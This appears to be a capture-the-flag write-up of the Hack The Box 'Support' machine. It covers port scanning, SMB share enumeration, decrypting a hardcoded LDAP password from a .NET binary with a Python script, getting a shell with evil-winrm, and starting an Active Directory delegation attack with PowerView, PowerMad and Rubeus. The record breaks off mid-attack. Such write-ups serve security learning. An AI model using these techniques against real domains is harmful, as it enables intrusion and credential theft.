$ sudo nmap -T4 -sC -sV -O 10.10.11.174 -oN nmap.txt -Pn -p-
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-06 16:37 CST
Nmap scan report for 10.10.11.174
Host is up (0.21s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-12-07 01:25:54Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49679/tcp open msrpc Microsoft Windows RPC
49705/tcp open msrpc Microsoft Windows RPC
60575/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: -1s
| smb2-time:
| date: 2022-12-07T01:26:56
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in
Enumeration - DNS
Obviously there's a lot going on in the port list, I'll start at the top and see if I can extract anything from the DNS server.
$ dig version.bind CHAOS TXT @10.10.11.174
Using dig to grab a BIND DNS banner didn't give me any answers. How about ANY records?
$ dig any support.htb @10.10.11.174
; <<>> DiG 9.16.33-Debian <<>> any support.htb @10.10.11.174
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 59774
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 0, ADDITIONAL: 2
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;support.htb. IN ANY
;; ANSWER SECTION:
support.htb. 600 IN A 10.10.11.174
support.htb. 3600 IN NS dc.support.htb.
support.htb. 3600 IN SOA dc.support.htb. hostmaster.support.htb. 104 900 600 86400 3600
;; ADDITIONAL SECTION:
dc.support.htb. 1200 IN A 10.10.11.174
;; Query time: 1590 msec
;; SERVER: 10.10.11.174#53(10.10.11.174)
;; WHEN: Tue Dec 06 16:51:06 CST 2022
;; MSG SIZE rcvd: 136
I get a couple subdomains from this. I'll save these for later as I'm not quite sure yet. I'll assume dc is domain controller, although my Windows knowledge is still very fresh. In the meantime, I start a a gobuster DNS brute force to see if there are any other undisclosed subdomains. Time to move on to SMB for a bit.
Enumeration - SMB
$ smbmap -H 10.10.11.174 -u anonymous
[+] Guest session IP: 10.10.11.174:445 Name: dc.support.htbn
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
support-tools READ ONLY support staff tools
SYSVOL NO ACCESS Logon server share
Interesting. A read-only share support-tools, what sort of data can we find in there.
$ smbclient \\\\10.10.11.174\\support-tools
Enter WORKGROUP\ventus's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Wed Jul 20 12:01:06 2022
.. D 0 Sat May 28 06:18:25 2022
7-ZipPortable_21.07.paf.exe A 2880728 Sat May 28 06:19:19 2022
npp.8.4.1.portable.x64.zip A 5439245 Sat May 28 06:19:55 2022
putty.exe A 1273576 Sat May 28 06:20:06 2022
SysinternalsSuite.zip A 48102161 Sat May 28 06:19:31 2022
UserInfo.exe.zip A 277499 Wed Jul 20 12:01:07 2022
windirstat1_1_2_setup.exe A 79171 Sat May 28 06:20:17 2022
WiresharkPortable64_3.6.5.paf.exe A 44398000 Sat May 28 06:19:43 2022
4026367 blocks of size 4096. 969076 blocks available
smb: \>
Reverse Engineering
UserInfo.exe.zip eh? Unzipped: (oh and by the way, that gobuster DNS brute didn't give anything more)
$ ls
.rw-rw-rw- 99k ventus 1 Mar 12:18 CommandLineParser.dll
.rw-rw-rw- 22k ventus 22 Oct 2021 Microsoft.Bcl.AsyncInterfaces.dll
.rw-rw-rw- 47k ventus 22 Oct 2021 Microsoft.Extensions.DependencyInjection.Abstractions.dll
.rw-rw-rw- 84k ventus 22 Oct 2021 Microsoft.Extensions.DependencyInjection.dll
.rw-rw-rw- 64k ventus 22 Oct 2021 Microsoft.Extensions.Logging.Abstractions.dll
.rw-rw-rw- 20k ventus 19 Feb 2020 System.Buffers.dll
.rw-rw-rw- 141k ventus 19 Feb 2020 System.Memory.dll
.rw-rw-rw- 115k ventus 15 May 2018 System.Numerics.Vectors.dll
.rw-rw-rw- 18k ventus 22 Oct 2021 System.Runtime.CompilerServices.Unsafe.dll
.rw-rw-rw- 25k ventus 19 Feb 2020 System.Threading.Tasks.Extensions.dll
.rwxrwxrwx 12k ventus 27 May 12:51 UserInfo.exe
.rw-rw-rw- 563 ventus 27 May 11:59 UserInfo.exe.config
I originally dragged UserInfo.exe into Ghidra to decompile it, although that didn't do too well so I tried out DNSpy and that did a great job at decompiling this .NET binary.
Moving along, I looked through the PE's objects to get a grasp on what this binary does. In the UserInfo.Services namespace, I find the LdapQuery class. Its methods include query() and printUser(). On class initialization, there is a call to Protected.getPassword() which I can assume it may be the LDAP password. That password is then used to login to the support.htb LDAP server through the System.DirectoryServices library. Sounds like a way in, time to check out the getPassword method.
Let's step through the method. First off, it's decoding Protected.enc_password in Base64 format. After that, it copies the character array of the Base64 decoded string, goes into a for loop based on the original array length, and does some XOR and moduli with the key's character index to decrypt it. Sorry to say that security by obscurity doesn't quite work that well.
Protected.getPassword()
for (int i = 0; i < array.Length; i++)
{
array2[i] = array[i] ^ Protected.key[i % Protected.key.Length] ^ 223;
}
I'll copy this over in Python to see if I can decrypt it there.
decrypt_password.py
import base64
key = "a...o".encode("utf-8")
enc = base64.b64decode("O...E")
print("".join([chr(enc[i] ^ key[i % len(key)] ^ 223) for i in range(len(enc))]))
$ python decrypt_password.py
n...z
Exploiting LDAP
Alright let's try it. Using the username from LdapQuery initializer and the password we decoded, I tried to do an ldapdomaindump and...
$ ldapdomaindump 10.10.11.174 -u 'support\\ldap' -p 'n...z' -at SIMPLE
[*] Connecting to host...
[*] Binding to host
[!] Could not bind with specified credentials
[!] {'result': 49, 'description': 'invalidCredentials', 'dn': '', 'message': '80090308: LdapErr: DSID-0C090436, comment: AcceptSecurityContext error, data 52e, v4f7c\x00', 'referrals': None, 'saslCreds': None, 'type': 'bindResponse'}
Possibly not using this correctly. I need to read up on LDAP. Good ol' HackTricks GitBook helped me through a lot of service exploitation, here's a section on LDAP. Let's use ldapsearch and filter for sAMAccountName as stated in the LdapQueryquery method.
If there's one thing I learned about LDAP, it's that it gives you so many lines of info. Anyways. Lots of stuff, but I see a user named support here. Let's dig into that.
This info field had a string that looked very much like a passphrase. Time to save that.
Getting access
I was stuck for a while, I wasn't sure what to do next even though I had creds to test. I looked back at the nmap scan results again and researched more about Windows administration services. After more consulting with the wonderful HackTricks GitBook, I found WinRM which might allow me to get command line access to the server. I picked up evil-winrm to try and authenticate with the server from my Linux box.
$ evil-winrm -u support -p 'Iron...l' -i 10.10.11.174
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\support\Documents>
After some with evil-winrm's command arguments (I was stuck on having the wrong domain in the -i flag, but apparently it's not needed), finally I have acquired PowerShell access on the server. Now it's time for looting.
Privilege Escalation
Alright, heading to Desktop, I get the user flag and now it's time for privilege escalation. This part was going way over my head. I took a look at the Windows Local Privilege Escalation section from HackTricks, but nothing seemed too viable. It seemed the support user had limited privileges and was denied access to many system tasks, even stuff as basic as systeminfo. mimikatz it is. Worth a shot.
Alright then, nevermind. WinRM says no. Guess it's back to the drawing board.
Active Directory & Kerberos Abuse
After about half an hour of research, I crawled upon AD/Kerberos abuse which seemed to be my only hope at the moment. Firstly, I wanted to get some PowerShell post-exploitation modules going. With evil-winrm, I uploaded PowerView.ps1 which is a pretty large module, but it would make life easier. Since we didn't seem to have any users with SPN enabled, I think this process from Red Team Notes is what I'm gonna go with first.
First off, I need to verify we can create new Computer objects to the domain. Looks like we can.
Get-DomainController tells us that we're using Windows Server 2022 Standard. Next I need to find a Computer object which does not have a specific flag set. Viewing all AD computers, I find the DCcomputer does not have this flag set.
*Evil-WinRM* PS C:\Users\support\Desktop> Get-NetComputer DC | Select-Object -Property name, msds-allowedtoactonbehalfofotheridentity*
name msds-allowedtoactonbehalfofotheridentity*
---- -----------------------------------------
DC
Now let's load PowerMad and create a Computer object.
Nice, things are lining up. Now, Red Team Notes wants to use Rubeus to allow raw interactions with Kerberos abuses. I didn't want to compile it on my machine, but I did find a compiled binary here. I uploaded it through WinRM and continued with the process.
